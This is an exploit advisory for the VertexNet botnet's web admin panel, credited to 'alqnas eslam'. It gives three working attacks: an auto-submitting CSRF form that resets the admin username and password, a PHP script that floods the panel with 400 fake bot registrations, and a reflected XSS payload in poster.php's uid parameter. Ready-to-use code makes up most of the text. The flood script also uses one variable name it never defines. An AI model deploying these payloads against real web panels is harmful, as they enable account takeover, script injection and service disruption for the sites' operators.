# Exploit Title: VertexNet botnet v1.1 multi vulnerability # Date: 3-12-2015 # Exploit Author: alqnas eslam # Vendor Homepage:fb.com/alqnas4 # Software Link: http://darkcomet-rat.com/ # Tested on:windows or linux 1- csrf change password and setting: save this code in html file and send it to admin when he open it the setting will be changed <body onload="document.alqnas.submit()"> <form action="http://localhost/panel/index.php?page=set" method="post" name="alqnas"> <input type="text" name="maxusers" value="15" /> <input type="text" name="userswidth" value="400" /> <input type="text" name="showgeo" value="y" /> <input type="text" name="showoff" value="y" /> <input type="text" name="username" value="admin" /> <input type="text" name="password" value="alqnas" /> <input type="submit" /> </form> </body> 2- bots flood: you can do flood bots by this code run it with php <?php $i =1; function adduser($url) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,true); $output=curl_exec($ch); curl_close($ch); return $output; } //400 are numbers you will send it while ( $i <=400){ $rand = substr( $d , 0 , 5 ); $shuf = substr( $a , 0 , 5 ); $d = str_shuffle("abcdefghijklmnopqrstuvwxyz0123456789"); $a = str_shuffle("abcdefghijklmnopqrstuvwxyz0123456789"); //change localhost to url of bot echo adduser("http://localhost/Panel/adduser.php?uid=$rand&cmpname=$suf&country=$rand&cc=$shuf&idle=$rand&lan=$rand&ver=$shuf"); $i++; } ?> 3- cross site scripting (xss) in file poster.php prametar uid not fillter from html code so we can do xss attack http://localhost/Panel/poster.php?uid="><script>alert(/xss/)</script>